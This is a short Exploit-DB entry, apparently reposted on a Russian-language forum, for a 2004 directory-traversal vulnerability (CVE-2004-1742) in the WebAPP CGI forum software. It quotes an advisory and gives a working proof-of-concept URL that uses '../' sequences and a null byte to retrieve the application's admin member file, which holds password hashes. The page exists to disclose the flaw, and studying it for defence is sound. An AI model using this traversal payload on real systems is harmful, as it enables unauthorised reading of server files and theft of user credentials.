- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24408
- Проверка EDB
-
- Пройдено
- Автор
- JEROME ATHIAS
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2004-1742
- Дата публикации
- 2004-08-24
Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/11028/info
WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data.
An attacker can exploit this vulnerability to retrieve arbitrary, potentially sensitive files from the hosting computer with the privileges of the webserver. gthe attacker could trivially retrieve DES-encrypted password hashes for all users of the application. This may aid the attacker in further attacks.
http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00- Источник
- www.exploit-db.com
